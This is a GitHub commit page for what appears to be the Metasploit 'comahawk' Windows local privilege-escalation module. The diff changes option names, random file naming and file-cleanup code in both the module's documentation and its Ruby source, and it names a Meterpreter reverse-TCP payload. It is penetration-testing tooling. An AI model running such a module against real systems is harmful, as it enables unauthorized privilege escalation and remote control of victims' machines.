more bcoles suggestions

snotsbubble · Dec 18, 2019 · f9fbe96 · f9fbe96
1 parent 66dcbc5
commit f9fbe96
Show file tree

Hide file tree

Showing 2 changed files with 12 additions and 13 deletions.
diff --git a/documentation/modules/exploit/windows/local/comahawk.md b/documentation/modules/exploit/windows/local/comahawk.md
@@ -64,9 +64,9 @@ Module options (exploit/windows/local/comahawk):
    EXECUTE_DELAY    3                yes       The number of seconds to delay between file upload and exploit launch
    EXPLOIT_NAME                      no        The filename to use for the exploit binary (%RAND% by default).
    EXPLOIT_TIMEOUT  60               yes       The number of seconds to wait for exploit to finish running
-   PATH                              no        Path to write binaries if (%TEMP% by default).
-   PAYLOAD_NAME                      no        The filename for the payload to be used on the target host if (%RAND%.exe by default).
+   PAYLOAD_NAME                      no        The filename for the payload to be used on the target host (%RAND%.exe by default).
    SESSION          1                yes       The session to run this module on.
+   WRITABLE_DIR                      no        Path to write binaries (%TEMP% by default).
 
 
 Payload options (windows/x64/meterpreter/reverse_tcp):

diff --git a/modules/exploits/windows/local/comahawk.rb b/modules/exploits/windows/local/comahawk.rb
@@ -72,8 +72,8 @@ def initialize(info = {})
   end
 
   def exploit
-    exploit_name = datastore['EXPLOIT_NAME'] || Rex::Text.rand_text_alpha((rand(8) + 6))
-    payload_name = datastore['PAYLOAD_NAME'] || Rex::Text.rand_text_alpha((rand(8) + 6))
+    exploit_name = datastore['EXPLOIT_NAME'] || Rex::Text.rand_text_alpha((rand(6..14)))
+    payload_name = datastore['PAYLOAD_NAME'] || Rex::Text.rand_text_alpha((rand(6..14)))
     exploit_name = "#{exploit_name}.exe" unless exploit_name.end_with?('.exe')
     payload_name = "#{payload_name}.exe" unless payload_name.end_with?('.exe')
     temp_path = datastore['WRITABLE_DIR'] || session.sys.config.getenv('TEMP')
@@ -136,15 +136,14 @@ def validate_target
   end
 
   def ensure_clean_destination(path)
-    if file?(path)
-      print_status("#{path} already exists on the target. Deleting...")
-      begin
-        file_rm(path)
-        print_status("Deleted #{path}")
-      rescue Rex::Post::Meterpreter::RequestError => e
-        elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}")
-        print_error("Unable to delete #{path}")
-      end
+    return unless file?(path)
+    print_status("#{path} already exists on the target. Deleting...")
+    begin
+      file_rm(path)
+      print_status("Deleted #{path}")
+    rescue Rex::Post::Meterpreter::RequestError => e
+      elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}")
+      print_error("Unable to delete #{path}")
     end
   end
 end